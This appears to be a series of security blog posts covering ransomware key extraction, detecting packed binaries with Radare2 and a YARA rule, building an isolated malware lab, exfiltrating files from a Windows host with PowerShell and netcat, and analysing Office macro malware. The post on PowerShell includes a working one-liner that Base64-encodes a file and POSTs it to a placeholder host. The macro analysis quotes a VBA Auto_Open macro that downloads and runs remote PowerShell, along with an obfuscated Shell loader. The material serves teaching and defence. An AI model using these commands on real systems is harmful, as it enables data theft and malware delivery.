The AES encryption requires a key and an initialization vector, meaning that it's possible that this key that was downloaded contains both values. Lets extract the key and IV values from the file with the xxd command

$ xxd -l 32 -ps 3flsy
f3fc056da1185eae370d76d47c4cf9db9f4efd1c1585cde3a7bcc6cb5889
f6db

$ xxd -s 32 -ps 3flsy
01448c7909939e13ce359710b9f0dc2e

The -l stops the printing of the hexdump after the specified amount of bytes. The -s starts at the specified bytes, instead of starting at 0. The -ps option prints only the hex values

These values are used in the AES Decrypt recipe in CyberChef, along with the encrypted files.

The encrypted data can now be restored to it's original state.

Conclusion

The threat actor has altered their tactics and now doesn't hard code all of the necessary information, while making them available through a web service that can be easily altered to change the result of the encryption.

Analyzing Packed Binaries

Sat, 23 Sep 2023 23:17:22 +0000

Packing is a technique used by software developers to reduce the size of executables, obfuscate machine code with the intention of protecting intellectual property, among other reasons. These are just some of the legitimate uses for implementing this technique on executables and other similar binary files. Malware developers also utilize this technique to prevent their malicious executables from being easily detected and to make it more difficult for analysis.

The process of packing an executable depends on the intended goal, which could be compression, obfuscation, encryption, or a combination of these techniques. Regardless of the extent of modifications made, the executable's structure is altered to incorporate the essential code for unpacking the machine code in memory during program execution on the user's system. Additionally, it includes the necessary data for the program.

There are both open-source and commercial packers available. These tools often insert strings or name the sections containing the unpacking sequence in a specific manner, which can be used to identify the packer that was used. However, some malware developers may devise their own packing techniques or tools. They may also alter section names or remove the strings added by well-known packers to make it even more challenging for malware analysts to determine which packer was employed.

A packing process typically involves several steps, which can vary depending on the specific tools and the purpose of implementation. The general process encompasses the following stages:

Compression: The original executable undergoes compression using an algorithm to reduce its size.
Encryption: An additional layer of protection is applied using a specific key or algorithm.
Header modification: Changes are made to reflect the alterations and ensure the executable remains valid. This often includes markers for identifying the packer used.
Runtime Decryption/Decompression: Code necessary for extracting the original executable into memory is added to the new file, serving as the new entry point for the program.
Anti-analysis measures: Some packing tools may employ techniques to deter analysis, debugging, or emulation, aiming to hinder the examination of the original code.
Execution flow control: Essential instructions are incorporated to manage the execution flow, ensuring seamless execution of the original code.

Additionally, some packing tools may include extra code to dynamically alter behavior during execution, making it more challenging for an analyst to discern the actions taken by the malware.

Detecting Packing

One important aspect is to determine whether a sample being analyzed is packed or not, since this determines the approach to the analysis of the binary file. While most analysis tools can identify whether the binary is packed and which packing program was used, it remains beneficial to understand how to analyze such files.

Tools capable of detecting packed binaries often rely on signatures, which are patterns or identifying strings inserted by packers and are widely recognized. The following Yara rule can be used to identify binaries packed with RLPack.

rule rlpack {
    meta:
        description = "RLPack packed file"
        block = false
        quarantine = false

    strings:
        $mz = "MZ"
        $text1 = ".packed\x00"
        $text2 = ".RLPack\x00"

    condition:
        $mz at 0 and $text1 in (0..1024) and $text2 in (0..1024)
}

Signatures can be created based on various elements, including section names, header values, structure, and the Import Address Table (IAT) of the binary generated by the packer software. Packers often introduce sections with specific names and characteristics. While some packers only display sections specific to the packer itself, others add the necessary sections to the list of sections that exist in the original binary. While this can assist in identifying the tool used, developers can also change the names of these sections without modifying the packer's code or the resulting binary. Despite the possibility of section name changes, the respective sections and other characteristics remain the same, and this information is used to determine which packer was employed.

Similarly, the header can be analyzed to determine the packer used. While the header's structure may vary depending on the original binary, packers often introduce values or set the header to a specific structure. The section headers specify both the size of data as it occupies on disk and its size when loaded into memory. A significant difference between these two values can indicate that the data is uncompressed or decrypted in memory. For instance, the UPX packer stores all data in one section, which has a size of zero on disk. However, when loaded into memory, the section expands to a larger size, encompassing the entire program.

The Import Address Table (IAT) is a structure within the PE header that specifies the list of functions or procedures imported from dynamic link libraries (DLLs). This allows the executable to locate and access the required functions at runtime. ELF binaries use the Procedure Linkage Table (PLT) and Global Offset Table (GOT) to achieve a similar purpose as the IAT in PE files. These structures differ in design and function, but they share the goal of importing functions or procedures from external libraries. Packers have specific functions that they call, which they may do by directly linking to external libraries or by dynamically resolving API calls. As a result, the import tables will have a specific set of functions or procedures listed or may have an incomplete list.

While the aspects mentioned above are considered during static analysis, dynamic analysis is also employed to assess the packing techniques in use. This involves using a debugger and disassembly to identify the instructions and flow of the binary. Dynamic analysis is particularly useful for extracting unpacked code when it resides in memory. It's important to note that the extracted program will require additional steps to become a valid executable on disk for further analysis and won't exactly match the original version of the binary file.

Let's examine an example binary that has been packed using UPX and ASPack to better understand the differences. This example is a Windows PE program that, when executed, displays a message box and performs no other actions.

The source code of this program is only the lines shown below, any additional functions and data is added by the compiler. This program was compiled in Microsoft Visual Studio 2022.

#include 

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    MessageBox(NULL, L"Hello there! - General Kenobi", L"Star Wars Quote", MB_OK | MB_ICONINFORMATION);
    return 0;
}

For the analysis phase, Radare2 is used, but any other tool can be used to achieve the same results. The original binary file is initially examined to establish a baseline. The sections are displayed using the iS command, the entropy of each section is displayed by adding the parameter entropy to the command.

[Sections]

nth paddr        size vaddr        vsize perm entropy    type name
――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000400  0xe00 0x00401000  0x1000 -r-x 5.92845120 ---- .text
1   0x00001200  0xc00 0x00402000  0x1000 -r-- 4.55813641 ---- .rdata
2   0x00001e00  0x200 0x00403000  0x1000 -rw- 0.28040117 ---- .data
3   0x00002000  0x200 0x00404000  0x1000 -r-- 4.70150326 ---- .rsrc
4   0x00002200  0x200 0x00405000  0x1000 -r-- 4.86675397 ---- .reloc

There are several sections that are listed, the size refers to the amount of space consumed by the section on disk, while the vsize refers to the amount of space that is allocated in memory for the program. The difference between these 2 sizes is small, with the sizes ranging from 512 bytes to 3.5 Kilobytes for the size on disk, while the memory allocated for each of the sections is for 4 Kilobytes. This is not a big enough difference to point to packing being used.

The entropy can be used to determine the level of randomness that exists in the section, these values will be compared later on when the packed samples are analyzed.

The linked libraries are listed using the command il, for this program there are only 8 DLLs that are linked and none are suspicious

[Linked libraries]
user32.dll
vcruntime140.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
kernel32.dll

8 libraries

The functions that are imported from these libraries can be listed with the ii command. The only function that was specified in the source code used for this program is MessageBoxW, the other functions are listed because they are used by other parts of the program that get added by the compiler and aren't necessarily used.

[Imports]
nth vaddr      bind type lib                               name
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
1   0x00402038 NONE FUNC USER32.dll                        MessageBoxW
1   0x00402040 NONE FUNC VCRUNTIME140.dll                  __current_exception
2   0x00402044 NONE FUNC VCRUNTIME140.dll                  _except_handler4_common
3   0x00402048 NONE FUNC VCRUNTIME140.dll                  __current_exception_context
4   0x0040204c NONE FUNC VCRUNTIME140.dll                  memset
1   0x0040206c NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _crt_atexit
2   0x00402070 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _cexit
3   0x00402074 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll terminate
4   0x00402078 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _register_onexit_function
5   0x0040207c NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _register_thread_local_exe_atexit_callback
6   0x00402080 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _exit
7   0x00402084 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _initterm
8   0x00402088 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _get_narrow_winmain_command_line
9   0x0040208c NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _initialize_narrow_environment
10  0x00402090 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _configure_narrow_argv
11  0x00402094 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _c_exit
12  0x00402098 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _set_app_type
13  0x0040209c NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _seh_filter_exe
14  0x004020a0 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _initialize_onexit_table
15  0x004020a4 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll exit
16  0x004020a8 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _controlfp_s
17  0x004020ac NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _initterm_e
1   0x00402064 NONE FUNC api-ms-win-crt-math-l1-1-0.dll    __setusermatherr
1   0x004020b4 NONE FUNC api-ms-win-crt-stdio-l1-1-0.dll   _set_fmode
2   0x004020b8 NONE FUNC api-ms-win-crt-stdio-l1-1-0.dll   __p__commode
1   0x0040205c NONE FUNC api-ms-win-crt-locale-l1-1-0.dll  _configthreadlocale
1   0x00402054 NONE FUNC api-ms-win-crt-heap-l1-1-0.dll    _set_new_mode
1   0x00402000 NONE FUNC KERNEL32.dll                      GetCurrentProcessId
2   0x00402004 NONE FUNC KERNEL32.dll                      GetModuleHandleW
3   0x00402008 NONE FUNC KERNEL32.dll                      GetStartupInfoW
4   0x0040200c NONE FUNC KERNEL32.dll                      IsDebuggerPresent
5   0x00402010 NONE FUNC KERNEL32.dll                      InitializeSListHead
6   0x00402014 NONE FUNC KERNEL32.dll                      GetSystemTimeAsFileTime
7   0x00402018 NONE FUNC KERNEL32.dll                      GetCurrentThreadId
8   0x0040201c NONE FUNC KERNEL32.dll                      UnhandledExceptionFilter
9   0x00402020 NONE FUNC KERNEL32.dll                      QueryPerformanceCounter
10  0x00402024 NONE FUNC KERNEL32.dll                      IsProcessorFeaturePresent
11  0x00402028 NONE FUNC KERNEL32.dll                      TerminateProcess
12  0x0040202c NONE FUNC KERNEL32.dll                      GetCurrentProcess
13  0x00402030 NONE FUNC KERNEL32.dll                      SetUnhandledExceptionFilter

Looking at the list of functions, there are some that may generate some concern and are often used by malware for different reasons. One of these functions is IsDebuggerPresent, which can be used by malware as an anti-analysis technique. The command axt can be used to check where the function is being called, the address of the function is used as the argument for the command.

[0x00401268]> axt 0x0040200c
fcn.004016fe 0x4017d6 [CALL:--x] call dword [sym.imp.KERNEL32.dll_IsDebuggerPresent]

If this sample was a potential malware, then it would be necessary to determine what makes the call to this function, however, this is outside of the scope of this blog post.

Loading the sample that is packed with UPX into Radare2 and displaying the sections that the PE binary has shows a very different story.

[Sections]

nth paddr         size vaddr        vsize perm entropy    type name
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000400     0x0 0x00401000  0x6000 -rwx            ---- UPX0
1   0x00000400  0x1200 0x00407000  0x2000 -rwx 7.32773884 ---- UPX1
2   0x00001600   0x600 0x00409000  0x1000 -rw- 3.88507214 ---- .rsrc

This program consists of only three sections. Two of these sections, namely UPX0 and UPX1, immediately indicate the packer used.

The UPX0 section has a size of 0 bytes on disk but allocates 24 Kilobytes when loaded into memory. This significant difference raises concerns. Furthermore, this section possesses read, write, and execute permissions, allowing it to be altered during runtime.

The UPX1 section exhibits high entropy compared to the unpacked version, which is unusual. Additionally, it has all permissions, which is not a typical configuration.

The libraries that are linked to the executable are the same as the unpacked version.

[Linked libraries]
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
kernel32.dll
user32.dll
vcruntime140.dll

8 libraries

However, the difference is significant when listing the imported functions, with the list being shorter and showing the calls to the LoadLibraryA, GetProcAddress, and VirtualProtect being used in this version but not in the unpacked version.

[Imports]
nth vaddr      bind type lib                               name
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
1   0x00409290 NONE FUNC api-ms-win-crt-heap-l1-1-0.dll    _set_new_mode
1   0x00409298 NONE FUNC api-ms-win-crt-locale-l1-1-0.dll  _configthreadlocale
1   0x004092a0 NONE FUNC api-ms-win-crt-math-l1-1-0.dll    __setusermatherr
1   0x004092a8 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll exit
1   0x004092b0 NONE FUNC api-ms-win-crt-stdio-l1-1-0.dll   _set_fmode
1   0x004092b8 NONE FUNC KERNEL32.DLL                      LoadLibraryA
2   0x004092bc NONE FUNC KERNEL32.DLL                      ExitProcess
3   0x004092c0 NONE FUNC KERNEL32.DLL                      GetProcAddress
4   0x004092c4 NONE FUNC KERNEL32.DLL                      VirtualProtect
1   0x004092cc NONE FUNC USER32.dll                        MessageBoxW
1   0x004092d4 NONE FUNC VCRUNTIME140.dll                  memset

Checking for references to these functions show that none exist, meaning that they are most likely being dynamically loaded

[0x00407e70]> axt 0x004092b8
[0x00407e70]> axt 0x004092c0
[0x00407e70]> axt 0x004092c4
[0x00407e70]> axt 0x004092cc
[0x00407e70]>

The functions that exist within the binary are listed using the afl command, in the packed version it only shows two functions. Despite the program only having one function in the source code, it contains a lot more functions that the packed version does.

0x00407e70   51    439 entry0
0x004071bb    3     37 fcn.004071bb

Checking for where the function named fcn.004071bb is called shows that there is no reference. The entry0 function has several call instructions listed, which isn't uncommon, but can point to areas to analyze further when debugging.

[0x00407e70]> axt 0x004071bb
[0x00407e70]> pdf @ entry0 ~ call
│     │╎╎   0x00407f8a      ff96b8820000   call dword [esi + 0x82b8]
│    ╎│ ╎   0x00407f9f      ff96c0820000   call dword [esi + 0x82c0]
│     │└──> 0x00407fb0      ff96bc820000   call dword [esi + 0x82bc]
│       ╎   0x00407ffe      ffd5           call ebp
│       ╎   0x00408013      ffd5           call ebp

Finally, analyzing the sample that was packed using ASPack, it shows a very different section table. It contains the same sections as the original version of the sample, but it adds the .aspack and .adata sections, and there is a higher level of entropy for those sections that match the original.

[Sections]

nth paddr         size vaddr        vsize perm entropy    type name
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000400   0xa00 0x00401000  0x1000 -rwx 7.31497939 ---- .text
1   0x00000e00   0x600 0x00402000  0x1000 -rw- 7.35641437 ---- .rdata
2   0x00001400   0x200 0x00403000  0x1000 -rw- 0.74297410 ---- .data
3   0x00001600   0x200 0x00404000  0x1000 -rw- 0.66525059 ---- .rsrc
4   0x00001800   0x200 0x00405000  0x1000 -rw- 4.86675397 ---- .reloc
5   0x00001a00  0x1400 0x00406000  0x2000 -rwx 6.17277319 ---- .aspack
6   0x00002e00     0x0 0x00408000  0x1000 -rwx            ---- .adata

The libraries that are linked remain as the same 8 that the original version references.

[Linked libraries]
kernel32.dll
user32.dll
vcruntime140.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll

8 libraries

However, checking the functions that are imported is more in line with the UPX packed version, with the difference being that it doesn't reference the ExitProcess and VirtualProtect functions.

[Imports]
nth vaddr      bind type lib                               name
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
1   0x00406fd0 NONE FUNC kernel32.dll                      GetProcAddress
2   0x00406fd4 NONE FUNC kernel32.dll                      GetModuleHandleA
3   0x00406fd8 NONE FUNC kernel32.dll                      LoadLibraryA
1   0x00407191 NONE FUNC user32.dll                        MessageBoxW
1   0x00407199 NONE FUNC vcruntime140.dll                  __current_exception
1   0x004071a1 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _crt_atexit
1   0x004071a9 NONE FUNC api-ms-win-crt-math-l1-1-0.dll    __setusermatherr
1   0x004071b1 NONE FUNC api-ms-win-crt-stdio-l1-1-0.dll   _set_fmode
1   0x004071b9 NONE FUNC api-ms-win-crt-locale-l1-1-0.dll  _configthreadlocale
1   0x004071c1 NONE FUNC api-ms-win-crt-heap-l1-1-0.dll    _set_new_mode

Checking the list of functions, it does appear to contain more functions than the UPX packed version

0x00406001    1     11 entry0
0x00406014    9    118 fcn.00406014
0x004066e0    5    106 fcn.004066e0
0x00406a9c    3    126 fcn.00406a9c
0x00406d0a    1     14 fcn.00406d0a
0x00406827    1     37 fcn.00406827
0x00406b1a    1     97 fcn.00406b1a
0x00406b7b   33    399 fcn.00406b7b
0x00406d18   29    664 fcn.00406d18
0x004067bc    5    107 fcn.004067bc
0x0040684c   15    380 fcn.0040684c
0x004069c8   14    212 fcn.004069c8

Based on this static analysis, which allows for the comparison of two packing tools, it becomes evident that the UPX packer provides several indicators that make detecting a packed binary relatively easier. These indicators are not necessarily easy to obfuscate. On the other hand, the ASPacker presents a somewhat simpler situation by adding only two sections that could potentially be renamed in an attempt to avoid detection. It's important to note that this analysis didn't include all aspects of the header that can reveal the packed nature of binaries. However, having the original binary for comparison greatly aids in understanding the changes that occur, although this may not always be the case when dealing with samples found in the wild.

In an upcoming post, I will explore the process of extracting unpacked data through dynamic analysis using a debugger. Dynamic analysis is a powerful technique that allows observation of how a packed binary behaves when executed, providing insights into its inner workings and uncovering potential security threats. Debugging tools enable stepping through the code, analyzing memory structures, and gaining a deeper understanding of the program's runtime behavior.

As this discussion on packing techniques and analysis concludes, it becomes evident that understanding the intricacies of packing is essential for both cybersecurity professionals and malware analysts. Whether detecting the telltale signs of packing or dynamically analyzing a binary, these skills are invaluable in the ever-evolving landscape of cybersecurity.

Malware Analysis Lab Build

Tue, 05 Jul 2022 03:39:05 +0000

Learning the craft of malware analysis requires for a lab to be built that allows for the malicious binaries and files to be safely analyzed and executed. This lab often involved multiple virtual machines that are able to interact with each other but not with any other computers on the network where the host OS resides or with the Internet, this means that it is necessary to create an isolated network that only those virtual machines can reach.

VirtualBox is one of the most common hypervisors that are used since it's free and runs in the most popular operating systems, it also has the features to configure the network that the virtual machines can use and generate snapshots of the virtual machine state.

In this post, the creation of the lab that uses VirtualBox and an isolated network is detailed. For the network configuration, the Internal Network is used and a DHCP server is configured in VirtualBox to hand out the IP addresses to the hosts, this is where this lab varies from other setups that I've seen.

Windows Host

Most malware is created for the Windows OS, this means that it is necessary to create a virtual machine that runs this OS and has the necessary tools for analyzing the malware.

The Windows 10 ISO can be downloaded from the Microsoft Evaluation Center, the Windows 11 ISO is also available on the same site. For the lab setup detailed here, a Windows 10 VM is going to be used, however, it is also possible to use Windows 11.

The virtual machine that is created with the Name of FlareVM, this can be anything and doesn't affect the rest of the lab build, then set the Type to Microsoft Windows and the Version to Windows 10 (64-bit). The amount of memory to reserve for the virtual machine will vary depending on the available memory for the host system, setting this to 4 GB (4096 MB) is generally a good amount to work with. The Hard disk size can be set to a minimum of 60 GB, though I usually set this to 100 GB.

After the virtual machine is created, I make some additional changes to the configuration prior to starting the machine for the first time

In the System section, the EFI is enabled, though this isn't required since the legacy BIOS can also be used

In the Processor tab, these settings will depend on the available resources of the host system. I set the processor count to 2 and also enable the PAE/NX and the Nested VT-x/AMD-V.

For the Display section, increase the Video Memory to 128 MB, which is the highest available when not enabling the 3D Acceleration. I also leave the 3D Acceleration disabled as I've found that it tends to generate display issues in Windows 10.

All other options can be left in their default configuration. The virtual machine can now be started and Windows 10 installed as normal, during the installation process disconnect the network cable from the virtual machine, this can be done by right clicking on the network icon on the bottom of the virtual machine window and unchecking the Connect network adapter option, this to avoid Windows from attempting to install updates and require a Microsoft 365 account for creating the user account.

After the Windows 10 OS has been installed, power off the system and create a snapshot of the virtual machine to have a restore point that can be used if necessary. The snapshot can be created with the following steps

Click on the Tools menu button that is found on the right side of the virtual machine entry in the VirtualBox main window
Select the Snapshots option from the menu
Click on the Take button from the toolbar, a window is displayed where a name can be given to the snapshot and a description

Start the Windows 10 virtual machine again and follow the steps mentioned in the Flare-VM repository to install the tools that will be used for malware analysis within the Windows 10 virtual machine. This process will require for a connection to the Internet, so be sure to enable the network connectivity.

REMNux

The other virtual machine that is created is the GNU/Linux distribution called REMnux, which is a distribution that contains several tools that can be used for malware analysis and reverse engineering.

The virtual appliance can be downloaded from the REMnux Documentation, there is a VirtualBox OVA file that is downloaded and has the virtual machine already setup.

While the virtual machine can be used as is, I recommend reviewing the settings to increase the Processor, Memory, and Display resources to increase the configuration depending on the available resources of the host system.

Isolated Network Setup

Once the virtual machines have been installed and are ready to be isolated, the Internal Network can be created in VirtualBox. Setting up the DHCP Server that will be used can only be done through the CLI by using the VBoxManage command.

The first command that is executed is to create the DHCP Server

VBoxManage dhcpserver add --network malwarelab --ip 10.0.0.1 --netmask 255.255.255.0 --lowerip 10.0.0.10 --upperip 10.0.0.100

Breaking down the command to detail each of the options that are specified

--network specifies the name that the network receives and that is used to reference the network when configuring the virtual machines or the network
--ip specifies the IP address that the DHCP server uses, can be either set to the first or last address in the subnet range, this is an IP address that no other virtual machine can use
--netmask sets the network mask that is used for the subnet, even though there are only two virtual machines that are created, other machines can be added to analyze more complex samples or certain behavior, so leaving this to a large netmask is ok
--lowerip specifies the start of the range of IP addresses that can be assigned to the hosts that make the DHCP request
--upperip specifies the end of the range of available IP address for assigning, in this sample command there are 90 IP addresses in the pool and this should be enough

At this point the initial configuration is created, however, there are a couple of DHCP options that need to be set in order to use the REMnux virtual machine to capture any outbound requests that are made from the Windows 10 virtual machine. The command below sets the DNS and Default Gateway parameters so that the Windows 10 host sends any requests to the REMnux host

VBoxManage dhcpserver modify --netname malwarelab --set-opt=3 '10.0.0.2' --set-opt=5 '10.0.0.2' --set-opt=6 '10.0.0.2'

The --set-opt option is used to specify the DHCP option that is being set, there are several options that exist, the ones being set in the command above are

3 Default Gateway
5 Name Server
6 Domain Name Servers

The option 6 is the one that sets the DNS server, however, the option 5 is also set to make sure that any requests to resolve a host or domain name are sent to the REMnux host.

These options are not dynamic, meaning that the REMnux virtual machine should have the IP address that is specified in the above command set via a static lease. This is configured with the command below

VBoxManage dhcpserver modify --network malwarelab --mac-address 08002780A107 --fixed-address '10.0.0.2'

The --mac-address option is used to specify the MAC address that the network interface receives, this is obtained from the Network configuration for the virtual machine in VirtualBox.

Make sure to check that the MAC address matches the one on the interface from the output of ip a, since some systems may set a random value that differs from the one set in VirtualBox

At this point, the DHCP Server can be enabled so that it can be used for the virtual machines, this is done with the command below

VBoxManage dhcpserver modify --netname malwarelab --enable

The configuration can be verified by running the command below, which lists all of the DHCP servers that are configured in VirtualBox

VBoxManage list dhcpservers

The final step is to set the Network configuration in each of the virtual machines that are part of the lab. After shutting down the virtual machines, go to the Network section in the Settings, set the Attached to to Internal Network and select the malwarelab from the Name dropdown.

Once the virtual machines are started, verify that the IP addresses are assigned accordingly and that they are able to contact each other.

Keep in mind that the Internal Network that is created has no access to any other network and only the virtual machines that are in this malwarelab network reach each other, this means that the virtual machines are completely isolated.

Data Exfiltration - Uploading from PowerShell

Thu, 11 Nov 2021 16:28:49 +0000

During a penetration testing engagement it may be necessary to extract files from a target host, though many tools exist for this job, there may be instances where interaction with the host is done only via a reverse shell and this can limit the available options.

This post goes over one method that can be used, which leverages the usage of the Invoke-WebRequest cmdlet in order to send data by using HTTP POST requests to send Base64 encoded data in the body of the request.

On the host that receives the data, start a netcat listener that pipes the data received to a file, this can be achieved with the following command

ncat -lvnp 8000 | tee data.b64

By piping the output of netcat to the tee command, it is easy to visualize the data that is being sent from the target host, since the data is Base64 encoded, it won't mess up the terminal and it will be easy to see when the data has finished transferring. Once the data transfer is complete, close the connection by pressing the ctrl+c keys on the terminal that is running the netcat listener.

On the target host, the file can be Base64 encoded with the following cmdlet

[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Path\to\file"))

The output can be stored in a variable, as shown below

$B64DATA = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Path\to\file"))

The command that is used to send the data is shown below

Invoke-WebRequest -uri http://example.com/data.raw -Method POST -Body $B64DATA

It can also be used directly on the Invoke-WebRequest cmdlet by using it within parenthesis, as can be seen in the following one-liner

Invoke-WebRequest -uri http://example.com/data.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Path\to\file")))

After the data is sent, the command will appear to be stuck, however, just need to close the netcat listener in order to terminate the session and gain the prompt back on the reverse shell.

The data.b64 file that is written on the host that receives the data contains the full HTTP POST request, however, the Base64 encoded string is a single line and can be easily decoded with the following command

tail -1 data.b64 | base64 -d > data.bin

The file data.bin can then be used or processed as needed. Though the steps above detail the process for handling binary data, these steps can be used with plain text files as well without any issues.

Analyzing Malware Documents

Mon, 18 Oct 2021 13:03:04 +0000

Having the possibility of including code within a file allows for certain tasks to be carried out when handling documents. Whether that is to enhance the content or to process data within the document. However, having this feature has been abused by malicious actors for a long time and little can be done to mitigate this attack vector without removing the functionality from the document.

Microsoft includes the ability to embed Visual Basic for Applications code within Office documents since 1993 with the first version being implemented in Excel. Allowing the users to record actions to automate working with documents.

Visual Basic for Applications or VBA is based off of Visual Basic 6, which it's Microsoft's event-driven programming language that was discontinued back in 2008. However, the language lives on in VBA and it facilitates automating tasks within Office Documents and also in VBScripts.

Office Document Structure

In early 2000, Microsoft changed the file format from a single binary file that had a closed standard to the open standard, which utilizes XML files to make up the file. It became the default format in Office 2007.

Officially called the Office Open XML and differentiated with an x at the end of the extension, the file itself is made up of mainly XML files which are contained in a zip archive. Besides XML files, any other files that are inserted into the document are also included within the zip archive.

Within the zip archive there are some files that exist independent of the type of document, these are the Metadata files, and files that exist depending on the type of document, these are called respectively Document and are stored in a directory with the document type as the name.

The contents of the archive may differ depending on the program that created the file.

Metadata Files

There are 3 files that are used for this section

Content Types: This XML file specifies the file type for any of the extensions of the files that are included within the archive. The file is named [Content_Types].xml
Relationships: The files that end in .rels act as a type of index file, meaning that this tells the program where to locate all of the files that are related to the different parts that make up the document. It is located in _rels/.rels, that contains the details for the primary files within the document.
References to Resources: Each component, for example a page within a Word document, will have it's own _rels/.xml.rels file that points to other files that have a relation with the specific resource, for example including an entry for an image file that is shown in one of the pages of the Word document.

Document Properties

Located in the directory docProps, this contains two XML files that contains the properties of the document

app.xml: This file contains several file properties that relate to the application, including metrics data and program versions
core.xml: This file contains document data such as Title, author, timestamps, among other properties. Some properties may be user modifiable and others are controlled by the program.

Main Document Contents

The document contents are included in this directory and the directory name depends on the program that creates the file

word: Word Documents
ppt: PowerPoint Presentations
xl: Excel Spreadsheets

The contents of this directory will vary between the format types, however, they mainly include any styling data and the distribution of the document contents.

Macros may also be included within this directory or they may exist in a separate Macros directory.

Media

This directory includes any media, such as images, that are inserted into the document.

Malware in Macros

Malware is often embedded within Office documents and use enticing names and messages to have users open the documents and ignore any alerts.

Original versions of Office would automatically execute any macros that were included, which made it easier for malicious actors as they would only need to have the victim open the file. Due to this, Microsoft changed the way the Macros work and now it requires user intervention to start the execution of the macro, the user is alerted of the risk of running macros in unknown files.

Because of this change, malicious actors need to resort to creative measures to have the victim ignore the alert and run the macro code. Corporate environments may use macros within their documents and don't always take into consideration the employee education or signing the documents to avoid any alerts, this results in users being educated to ignore the alerts and makes it easier for the malicious actors.

There are multiple ways that the macros can be abused to attack the victim's system. There are some cases where the malware is within the code itself or it may encode a binary file that is then decoded, saved to disk, and executed.

Recent cases are using the Office document as a first stage, where PowerShell code is leveraged to download a second stage which contains the actual malware. Due to current detection mechanisms in different security tools used, the malicious actors need to encode payloads and commands with different methods which include simple encoding algorithms, such as Base64, and reversing strings or obfuscating the strings within the code.

A simple example for a first stage using macros is shown in How to create Microsoft Office macro malware – phishing attack

Sub Auto_Open()
  Dim exec As String
  exec = “powershell.exe “”IEX ((new-object net.webclient).downloadstring(‘http://192.168.1.104/tar.txt’))”””
  Shell (exec)
End Sub

In this example, the attack is simple and is not obfuscated, the code simply downloads a file from a web server and executes it using PowerShell. The code in the PowerShell script could contain malicious intent in the way of being a second stage or even establishing a reverse shell, the possibilities are endless.

During an investigation, it would be necessary to download any additional files that the macro downloads in order to create the complete picture and look for indicators of compromise, these can be used to look for other systems that may have been infected or even establish monitoring rules to look out for new victims.

Parts of the malware can be placed within the metadata of the document, this serves as an easy hiding spot and can be quickly changed without having to go into the code to alter the payload.

Entry Point

For macro codes, there are several functions that can act as an entry point for the execution, this will depend on the intention or obfuscation method that the malicious actor may choose. It's more common for certain security applications to open email attachments for quick analysis, in order to avoid the malware from being triggered from the start, the malicious actor can use a different function that triggers the malware execution at a different point or under certain conditions.

Below is a sample obfuscated code that serves as the entry point for the malware, where the function DecodeDocument is used

Attribute VB_Name = "NewMacros"                                                   
Sub DecodeDocument()                                                                                                                                                 
Attribute DecodeDocument.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.DecodeDocument"
'                   
' DecodeDocument Macro        
'                                                                                 
'                  
    Dim d3h5dHh5U3BwaWxX
    ODppd2VGaGloc2dpSA = ThisDocument.BuiltInDocumentProperties(Chr(67) + Chr(111) + Chr(109) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(115))
    a3JtdnhXZ212aXF5UmVsdHBF = aWhzZ2lI("3/=<;:987654~}|{zyxwvutsrqponmlkjihgfe^]\[ZYXWVUTSRQPONMLKJIHGFE")                                
    d2hyZXFxc0doaWhzZ2lI = QmFzZTY0X0RlY29kZQo(ODppd2VGaGloc2dpSA, a3JtdnhXZ212aXF5UmVsdHBF)
    eHxpWHJtZXBU = aWhzZ2lI(d2hyZXFxc0doaWhzZ2lI)                                 
    d3h5dHh5U3BwaWxX = Shell(eHxpWHJtZXBU, vbHide)                                
End Sub

Base64 Decode Function

The VBA implementation does not contain a function or library that can quickly encode or decode Base64, however, it can be easily implemented using other areas of Office, an example is shown with the following code

Private Function EncodeBase64(ByRef arrData() As Byte) As String

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
   
    ' help from MSXML
    Set objXML = New MSXML2.DOMDocument
   
    ' byte array to base64
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.nodeTypedValue = arrData
    EncodeBase64 = objNode.Text

 

    ' thanks, bye
